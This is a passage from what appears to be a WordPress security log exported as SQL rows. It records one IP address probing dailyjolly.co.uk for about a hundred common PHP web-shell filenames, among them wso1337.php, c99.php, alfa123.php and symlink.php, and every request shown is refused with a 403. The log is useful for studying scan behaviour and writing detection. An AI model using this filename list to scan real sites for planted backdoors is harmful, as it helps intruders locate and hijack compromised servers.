3.5.30729)\"}','M8wTDPEs1Aq372KlJez5oiUa',0,1674458820.7229,176,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/sendmail.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','E7yLDczOH1IR4srwVfGxBkUv',0,1674458821.6080,196,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/rahma.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xsf3b5DGhLdevkBZEMU6YCOw',0,1674458822.4962,214,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/nasgor.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','GS6OHK9MwXpeEiZtbNU15fxT',0,1674458823.4371,227,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-confirm.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','uY8yXcIvCSNOgx5loiVhHek2',0,1674458824.3650,178,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alfa123.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bA6R5nWevJaHZhQVKg3SfEU0',0,1674458825.2685,178,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/upload.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QSBX2JxnUKTGC7zVPpH80uaY',0,1674458826.1615,161,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/bypass.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','PUyAB59fsDLQCdKo16Zph7cH',0,1674458827.0388,180,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-one.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','GTPUf4wsvmDMjAh9WrSklNIV',0,1674458827.9391,201,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/alexus.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','dxCAv5pSJRIf1YqKOsXLljna',0,1674458828.8380,170,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wso1337.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','uNy0RtKq2DQAnPX79oLVvwGd',0,1674458829.7362,186,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wjqEDb7Wt5L1HyacBVdo9FUA',0,1674459248.3108,182,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/0byte.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wsWINemUACRaf0tSbhxl9ZzL',0,1674459249.2015,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','aBfoIyXZqSFOHxAu2G7icrKT',0,1674459250.0694,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/sym.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','oqGTbVlhIwXY83u1K7fHjmvz',0,1674459250.9525,154,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/sym403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sag9wt4hFK1r6BAyb3VUOpGY',0,1674459251.8312,173,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xl.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QwfsAd25RvVt7imY9MroxG0L',0,1674459252.7143,178,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/symlink.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','B7T0Uw4EOsPqy6nlrmJFcig2',0,1674459253.5886,184,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','kocVrgHF4mN9lAfU30WqwSEh',0,1674459254.5264,172,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/404.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','26hbJYDCzLKZp5t80Sl1wk7o',0,1674459255.4079,194,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/403.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','p7ZdsFQbLzwkWuYqhnDxEjCO',0,1674459256.3029,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/up.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','5Nrh0OiLfKdtksbDjyuxXY9q',0,1674459257.1705,177,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/c99.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','r3Jd8lzY0DoTSQKEOmGZbXq4',0,1674459258.0566,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hklsQ5y1J3I08YwaAEN4LSVt',0,1674459258.9438,186,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/ok.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','uTw0mc5lqVZKJLEe6DfhUo18',0,1674459259.8180,231,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/0.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','FC8UhXs3agxRbI9Jiy47zokN',0,1674459260.7706,170,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','frz8VsKNbheo7MmFnGcjIJCW',0,1674459261.6586,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','fSgVT58z4UmeiYBRPALKhjqX',0,1674459262.5776,179,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/1.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','fdQsqN6RxHOEuTcbmyPeFGXM',0,1674459263.4776,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/2.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','YnSouT1vlxXCibc874OJeyQZ',0,1674459264.3577,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','g49GSL2PUnedKIAlD03HVjCx',0,1674459265.2381,161,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/4.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','jTl56SsikUnfu72Wbypvo8Dz',0,1674459266.1126,209,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','SXCurps67kVFJYWLENcQKIAH',0,1674459267.0557,198,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/6.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','APHULZ8FV6yhx59pQT2Cbk3W',0,1674459267.9757,167,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/7.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','N82HEk5cpT4KaUZflV0tF7Qj',0,1674459268.8572,171,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vK1eXsWSGin6URyrdFOAIH4z',0,1674459269.7274,192,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/9.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','acdzil9DCpVHNOLq6Ks1ZrW3',0,1674459270.6210,170,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/10.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qodZNuPnjb4c73GSwpaEeUzL',0,1674459271.4875,174,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/a.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','JRTKx9sLmiGelk6SaUWDoz85',0,1674459272.3708,166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','lwPOD6br7VtSyWGQpNZcnexg',0,1674459273.2535,192,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/e.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','2q0TLWw1J8s9FanPhMVQxKRH',0,1674459274.1815,165,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/r.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','hjKCSBd97wU1izQZxbENJ8XL',0,1674459275.0472,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ceGivz4QbMU6L3f8CYIqpntO',0,1674459275.9199,158,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0oM9guVz5kU4Z7SYCf8jvanO',0,1674459276.7820,188,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/u.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','oPynquzTs80efU1C5Zhi3gbQ',0,1674459277.6737,176,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/i.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8L6K4MnJyhvPsje0gufbxW19',0,1674459278.5688,197,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/o.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','u0VtG7bfmygCMKHIABNDXrSY',0,1674459279.4809,173,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/p.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','wgisdx5vNbZCRJ3YpT41cFMz',0,1674459280.3514,213,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/q.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','IJ9hcLTtWYBUNjCMSVKZ6o0y',0,1674459281.2752,197,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/s.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','OdxjPDVnv2maA1zUH7IrQtip',0,1674459282.1936,160,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/d.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','QIdmgTD8pCXznHWJFsiwePLB',0,1674459283.0490,198,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/f.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','n4bJk0ETVpA5xdrByOLGPsqS',0,1674459283.9791,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/g.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XKEQ4rf1iA06Dgl9h3z5ujNa',0,1674459284.8778,213,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/h.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nMPjwisENWSDLuCVTQ1khUoe',0,1674459285.7970,200,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/j.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','juZDCfQS6gIqYM4BKlJpVF7T',0,1674459286.6886,157,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/k.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','XaT15hQKtHjli8ERnOLCvrkS',0,1674459287.5785,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/l.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sWHjN6CV9bzBAqoZRntvKglG',0,1674459288.4579,177,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/m.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','20hauMgyzVlAPRYHUDnf5ZXw',0,1674459289.3501,158,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/w.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','T7a89Wu5HBciyjQlDVF6fEKA',0,1674459290.2217,168,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/v.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','nXLK6xsYOJl7e4VUzSZdgbow',0,1674459291.1044,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/n.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vEe9b1TU4qa07POBtFcHIxLM',0,1674459291.9848,158,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/b.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','spiMLAchGVk3XSd0PWTafujB',0,1674459292.8569,163,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/c.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Cvz9JDeHUnNh1RuTOBk53pGQ',0,1674459293.7248,165,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wp-wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EUGas8cIY5pHdD7vSRPijK4u',0,1674459294.5979,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/priv8.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qty85O14NbhKp2JB3FGHTvfi',0,1674459295.4851,190,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/minimo.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','GnqaIvk3OXpRM5xseT4yBZWl',0,1674459296.3757,154,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/V3.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','diJ4oeI60VRjGTtwASOPu7EQ',0,1674459297.2269,170,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/V5.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','ZX2LnuloQG90Kc6Ih7vPbpqO',0,1674459298.1320,195,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/www.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','EgerGJU8S5bNWROkdF4BMP6h',0,1674459299.0319,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/100.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','vcgO3G0C7yZK1kPFQIoaDx8m',0,1674459299.9157,172,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/777.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Hz4UEymWGDaAlB0L81VPKMYw',0,1674459300.7954,217,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/defau1t.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','sknIel9PrCd3qXGL47DxhoB2',0,1674459301.7517,212,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/xox.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','7nGkgaR5lKiwHFUOxNsmV0S9',0,1674459302.6941,182,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/new.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xZoJSFkapYeX7lB8tW09b31i',0,1674459303.5889,169,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/wi.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','8AZEgQJDkOzNp2YVx5mF7efn',0,1674459304.4648,159,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/mar.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','9o3ObhW1GXZ62LYusBUDTwpm',0,1674459305.3398,166,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/root.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','Ll6iBCsM3SPIQHUjptVdkGR4',0,1674459306.2085,164,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/nee.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','WtKQCoYxBp5IysgJjk9SUd4F',0,1674459307.0786,165,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','rRZj0fCLQ95qxTt4UiucklO3',0,1674459307.9685,179,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/lol.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','bXJnLY3ZMElVg9S1vR785rWm',0,1674459308.8785,176,'','GET',403,0,700,0,1,'',0),('20.244.36.78',351544398,'','https://www.dailyjolly.co.uk/87.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 